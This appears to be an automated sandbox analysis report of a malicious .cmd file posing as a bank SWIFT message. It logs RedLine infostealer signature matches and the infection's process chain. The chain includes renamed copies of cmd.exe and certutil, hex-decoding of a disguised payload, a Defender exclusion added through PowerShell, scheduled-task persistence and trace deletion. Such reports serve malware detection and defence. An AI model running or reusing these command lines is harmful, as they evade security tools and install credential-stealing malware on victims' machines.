                    Source: C:\Users\Public\kn.exe, Code function: 9_2_00007FF7F136F9B8 strcmp,#357,#359,NCryptOpenStorageProvider,#357,NCryptImportKey,#357,NCryptSetProperty,NCryptFinalizeKey,NCryptFreeObject,NCryptFreeObject,#359,CryptImportPKCS8,GetLastError,#357,CryptGetUserKey,GetLastError,#357,CryptGetUserKey,GetLastError,CryptDestroyKey,CryptReleaseContext,LocalFree
                    Source: C:\Users\Public\kn.exe, Code function: 9_2_00007FF7F137FC20 #359,#357,NCryptOpenStorageProvider,#357,NCryptImportKey,GetLastError,#357,#357,LocalFree,LocalFree,NCryptFreeObject,#357,NCryptFreeObject,#357
                    Source: C:\Users\Public\kn.exe, Code function: 9_2_00007FF7F13DE1F8 CertSaveStore,GetLastError,LocalAlloc,#357,CertSaveStore,GetLastError,#357,LocalFree,#357,#357,NCryptOpenStorageProvider,NCryptImportKey,NCryptSetProperty,NCryptFinalizeKey,LocalFree,LocalFree,NCryptFreeObject
                    Source: C:\Users\Public\kn.exe, Code function: 9_2_00007FF7F13A25E8 #357,#357,#357,CryptImportKey,GetLastError,#358,#357,CryptSetKeyParam,LocalFree,GetLastError,#357,#357,#357,CertFreeCertificateContext,CryptDestroyKey
                    Source: C:\Users\Public\kn.exe, Code function: 9_2_00007FF7F141A740 CryptAcquireContextW,GetLastError,#357,CryptImportKey,GetLastError,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,CryptGetUserKey,GetLastError,CryptDestroyKey,#357,CryptDestroyKey,CryptReleaseContext
                    Source: C:\Users\Public\kn.exe, Code function: 9_2_00007FF7F13CEA7C #357,#357,LocalAlloc,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptImportKey,GetLastError,CryptSetKeyParam,GetLastError,CryptSetKeyParam,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptSetKeyParam,GetLastError,#357,LocalFree,LocalFree,LocalFree,CryptDestroyHash,CryptDestroyHash
                    Source: C:\Users\Public\kn.exe, Code function: 9_2_00007FF7F13A29A0 #357,#357,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CertFreeCertificateContext,CryptReleaseContext,LocalFree,LocalFree,CryptDestroyKey
                    Source: C:\Users\Public\kn.exe, Code function: 9_2_00007FF7F13E0EF4 NCryptImportKey,#205,#359,#359,#357
                    Source: C:\Users\Public\kn.exe, Code function: 9_2_00007FF7F1416EA8 NCryptImportKey,#360
                    Source: C:\Users\Public\kn.exe, Code function: 9_2_00007FF7F13D0F58 CertAddEncodedCertificateToStore,GetLastError,#357,UuidCreate,StringFromCLSID,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,CertSetCTLContextProperty,GetLastError,CryptDestroyKey,CryptReleaseContext,CoTaskMemFree,CertFreeCertificateContext

                    System Summary

                    Source: 47.2.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 47.0.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 32.2.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 32.0.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: Trading_AIBot.exe.31.dr, cfRDgxIJtEfCD.cs Long String: Length: 17605
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe File dump: apihost.exe.33.dr 665670656
                    Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF7D152898C NtQueryInformationToken
                    Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF7D1513D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess
                    Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF7D1541538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW
                    Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF7D15289E4 NtQueryInformationToken,NtQueryInformationToken
                    Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF7D1528114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx
                    Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF7D153BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer
                    Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF7D15288C0 NtOpenThreadToken,NtOpenProcessToken,NtClose
                    Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF7D1527FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError
                    Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7D152898C NtQueryInformationToken
                    Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7D1513D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess
                    Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7D1541538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW
                    Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7D15289E4 NtQueryInformationToken,NtQueryInformationToken
                    Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7D1528114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx
                    Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7D153BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer
                    Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7D15288C0 NtOpenThreadToken,NtOpenProcessToken,NtClose
                    Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7D1527FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError
                    Source: C:\Users\Public\kn.exe Code function: 9_2_00007FF7F143C964 NtQuerySystemTime,RtlTimeToSecondsSince1970
                    Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 15_2_02EB8670 NtUnmapViewOfSection
                    Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 15_2_02EB8400 NtReadVirtualMemory
                    Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 15_2_02EB7A2C NtAllocateVirtualMemory
                    Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 15_2_02EBDC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose
                    Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 15_2_02EBDC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile
                    Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 15_2_02EB7D78 NtWriteVirtualMemory
                    Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 15_2_02EB8D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread
                    Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 15_2_02EBDD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose
                    Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 15_2_02EB7A2A NtAllocateVirtualMemory
                    Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 15_2_02EBDBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile
                    Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 15_2_02EB8D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread
                    Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF7D1515240: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPEAX@Z,memset,CreateFileW,DeviceIoControl,memmove,CloseHandle,??_V@YAXPEAX@Z,memset,FindClose,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z
                    Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF7D1524224 InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,wcsrchr,lstrcmpW,SetConsoleMode,CreateProcessW,CloseHandle,CreateProcessAsUserW,_local_unwind,GetLastError,_local_unwind,_local_unwind,CloseHandle,DeleteProcThreadAttributeList,GetLastError,GetLastError,DeleteProcThreadAttributeList
                    Source: C:\Users\Public\alpha.pif File created: C:\Windows
                    Source: C:\Users\Public\alpha.pif File created: C:\Windows \SysWOW64
                    Source: C:\Windows\System32\alg.exe File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\6465d78f7f049fe9.bin
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1414A409_2_00007FF7F1414A40
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13A69849_2_00007FF7F13A6984
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13989909_2_00007FF7F1398990
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13429409_2_00007FF7F1342940
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F141A9F09_2_00007FF7F141A9F0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13AE9F09_2_00007FF7F13AE9F0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13A09EC9_2_00007FF7F13A09EC
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13CAA009_2_00007FF7F13CAA00
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1418C589_2_00007FF7F1418C58
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F144CC8C9_2_00007FF7F144CC8C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13BCC809_2_00007FF7F13BCC80
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1390C289_2_00007FF7F1390C28
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1438CF49_2_00007FF7F1438CF4
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1358D009_2_00007FF7F1358D00
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13D2CF89_2_00007FF7F13D2CF8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F139CD109_2_00007FF7F139CD10
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13DCCA89_2_00007FF7F13DCCA8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1364B689_2_00007FF7F1364B68
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13F6B949_2_00007FF7F13F6B94
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1394B309_2_00007FF7F1394B30
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F138CBFC9_2_00007FF7F138CBFC
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F134AC089_2_00007FF7F134AC08
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13B8BD49_2_00007FF7F13B8BD4
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1424E589_2_00007FF7F1424E58
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1346EF49_2_00007FF7F1346EF4
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1428EAC9_2_00007FF7F1428EAC
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F137EED49_2_00007FF7F137EED4
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1422D6C9_2_00007FF7F1422D6C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13B6D7C9_2_00007FF7F13B6D7C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13A2D189_2_00007FF7F13A2D18
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1398D2C9_2_00007FF7F1398D2C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F136EDA49_2_00007FF7F136EDA4
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F138107C9_2_00007FF7F138107C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F139D0949_2_00007FF7F139D094
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13410309_2_00007FF7F1341030
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F135B09C9_2_00007FF7F135B09C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13E4F949_2_00007FF7F13E4F94
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1374F909_2_00007FF7F1374F90
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1368F1C9_2_00007FF7F1368F1C
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EA20C415_2_02EA20C4
                    Source: C:\Users\Public\alpha.exeCode function: String function: 00007FF7D1523448 appears 36 times
                    Source: C:\Users\Public\kn.exeCode function: String function: 00007FF7F13FABFC appears 818 times
                    Source: C:\Users\Public\kn.exeCode function: String function: 00007FF7F144F1B8 appears 183 times
                    Source: C:\Users\Public\kn.exeCode function: String function: 00007FF7F144F11C appears 37 times
                    Source: C:\Users\Public\kn.exeCode function: String function: 00007FF7F13DEB98 appears 93 times
                    Source: C:\Users\Public\kn.exeCode function: String function: 00007FF7F14564A6 appears 173 times
                    Source: C:\Users\Public\kn.exeCode function: String function: 00007FF7F1407BAC appears 34 times
                    Source: C:\Users\Public\kn.exeCode function: String function: 00007FF7F137BC9C appears 280 times
                    Source: C:\Users\Public\kn.exeCode function: String function: 00007FF7F134D1C8 appears 41 times
                    Source: C:\Users\Public\kn.exeCode function: String function: 00007FF7F1407D70 appears 35 times
                    Source: C:\Users\Public\kn.exeCode function: String function: 00007FF7F1400D10 appears 181 times
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: String function: 02EA46D4 appears 244 times
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: String function: 02EB894C appears 56 times
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: String function: 02EB89D0 appears 45 times
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: String function: 02EA44DC appears 74 times
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: String function: 02EA4500 appears 33 times
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: String function: 02EA4860 appears 949 times
                    Source: unknown, Driver loaded: C:\Windows\System32\drivers\AppVStrm.sys
                    Source: 47.2.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 47.0.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 32.2.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 32.0.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: armsvc.exe.31.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    Source: alg.exe.32.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    Source: AppVClient.exe.32.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    Source: DiagnosticsHub.StandardCollector.Service.exe.32.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    Source: FXSSVC.exe.32.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    Source: 32.3.Native_neworigin.exe.89ece0.17.raw.unpack, WP6RZJql8gZrNhVA9v.cs, Cryptographic APIs: 'CreateDecryptor'
                    Source: 32.2.Native_neworigin.exe.5a20000.7.raw.unpack, cPs8D.cs, Cryptographic APIs: 'TransformFinalBlock'
                    Source: 32.2.Native_neworigin.exe.5a20000.7.raw.unpack, 72CF8egH.cs, Cryptographic APIs: 'TransformFinalBlock'
                    Source: 32.2.Native_neworigin.exe.5a20000.7.raw.unpack, G5CXsdn.cs, Cryptographic APIs: 'TransformFinalBlock'
                    Source: 32.2.Native_neworigin.exe.5a20000.7.raw.unpack, 3uPsILA6U.cs, Cryptographic APIs: 'CreateDecryptor'
                    Source: 32.2.Native_neworigin.exe.5a20000.7.raw.unpack, 6oQOw74dfIt.cs, Cryptographic APIs: 'TransformFinalBlock'
                    Source: 32.2.Native_neworigin.exe.5a20000.7.raw.unpack, aMIWm.cs, Cryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                    Source: 32.2.Native_neworigin.exe.5a20000.7.raw.unpack, 3QjbQ514BDx.cs, Cryptographic APIs: 'TransformFinalBlock'
                    Source: classification engine, Classification label: mal100.spre.bank.troj.spyw.evad.winCMD@66/168@302/23
                    Source: C:\Users\Public\alpha.exe, Code function: 4_2_00007FF7D15132B0 _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,wcschr,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,GetLastError,GetLastError
                    Source: C:\Users\Public\kn.exe, Code function: 9_2_00007FF7F142826C GetCurrentThread,GetLastError,#357,OpenThreadToken,GetLastError,GetCurrentProcess,GetLastError,OpenProcessToken,GetLastError,AdjustTokenPrivileges,GetLastError,GetLastError,CloseHandle,CloseHandle
                    Source: C:\Users\Public\alpha.exe, Code function: 4_2_00007FF7D153FB54 memset,GetDiskFreeSpaceExW,??_V@YAXPEAX@Z
                    Source: C:\Users\Public\kn.exe, Code function: 9_2_00007FF7F1389220 VariantInit,#358,#359,SafeArrayCreate,SafeArrayPutElement,VariantClear,SafeArrayPutElement,VariantClear,CoCreateInstance,#357,VariantClear,SafeArrayDestroy,SysFreeString
                    Source: C:\Users\Public\kn.exe, Code function: 9_2_00007FF7F1453148 FindResourceExW,LoadResource
                    Source: C:\Windows\System32\extrac32.exe, File created: C:\Users\Public\alpha.exe
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe, Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-6465d78f7f049fe99e7986a9-b
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe, Mutant created: NULL
                    Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1832:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2056:120:WilError_03
                    Source: C:\Users\Public\Libraries\aymtmquJ.pif, Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-6465d78f7f049fe9-inf
                    Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6492:120:WilError_03
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, Mutant created: \Sessions\1\BaseNamedObjects\Phoenix_Clipper_666
                    Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1268:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4232:120:WilError_03
                    Source: C:\Windows\System32\alg.exe, Mutant created: \BaseNamedObjects\Global\Multiarch.m0yv-6465d78f7f049fe99ea72c54-b
                    Source: C:\Users\Public\Libraries\aymtmquJ.pif, File created: C:\Users\user~1\AppData\Local\Temp\Native_neworigin.exe
                    Source: C:\Users\Public\Libraries\AnyDesk.PIF, Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\Public\Libraries\Juqmtmya.PIF, Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe, WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe, WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\Public\Libraries\aymtmquJ.pif, File read: C:\Users\user\Desktop\desktop.ini
                    Source: C:\Windows\System32\extrac32.exe, Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd, ReversingLabs: Detection: 13%
                    Source: unknown, Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd" "
                    Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
                    Source: C:\Windows\System32\cmd.exe, Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                    Source: C:\Users\Public\alpha.exe, Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                    Source: C:\Windows\System32\cmd.exe, Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9
                    Source: C:\Users\Public\alpha.exe, Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9
                    Source: C:\Windows\System32\cmd.exe, Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12
                    Source: C:\Users\Public\alpha.exe, Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12
                    Source: C:\Windows\System32\cmd.exe, Process created: C:\Users\Public\Libraries\AnyDesk.PIF C:\Users\Public\Libraries\AnyDesk.PIF
                    Source: C:\Windows\System32\cmd.exe, Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
                    Source: C:\Windows\System32\cmd.exe, Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AnyDesk.jpeg" / A / F / Q / S
                    Source: C:\Users\Public\Libraries\AnyDesk.PIF, Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\aymtmquJ.cmd" "
                    Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                    Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
                    Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
                    Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
                    Source: C:\Users\Public\Libraries\AnyDesk.PIF, Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\Public\Libraries\AnyDesk.PIF /d C:\\Users\\Public\\Libraries\\Juqmtmya.PIF /o
                    Source: C:\Windows\SysWOW64\esentutl.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                    Source: C:\Users\Public\alpha.pif, Process created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                    Source: C:\Users\Public\Libraries\AnyDesk.PIF, Process created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pif
                    Source: C:\Users\Public\Libraries\aymtmquJ.pif, Process created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe "C:\Users\user~1\AppData\Local\Temp\Native_neworigin.exe"
                    Source: C:\Users\Public\Libraries\aymtmquJ.pif, Process created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user~1\AppData\Local\Temp\Trading_AIBot.exe"
                    Source: unknown, Process created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 05:06 /du 23:59 /sc daily /ri 1 /f
                    Source: C:\Windows\SysWOW64\schtasks.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: unknown, Process created: C:\Windows\System32\AppVClient.exe C:\Windows\system32\AppVClient.exe
                    Source: unknown, Process created: C:\Users\Public\Libraries\Juqmtmya.PIF "C:\Users\Public\Libraries\Juqmtmya.PIF"
                    Source: C:\Users\Public\Libraries\Juqmtmya.PIF, Process created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pif
                    Source: C:\Users\Public\Libraries\aymtmquJ.pif, Process created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe "C:\Users\user~1\AppData\Local\Temp\Native_neworigin.exe"
                    Source: C:\Windows\System32\cmd.exe, Section loaded: cmdext.dll
                    Source: C:\Windows\System32\cmd.exe, Section loaded: apphelp.dll
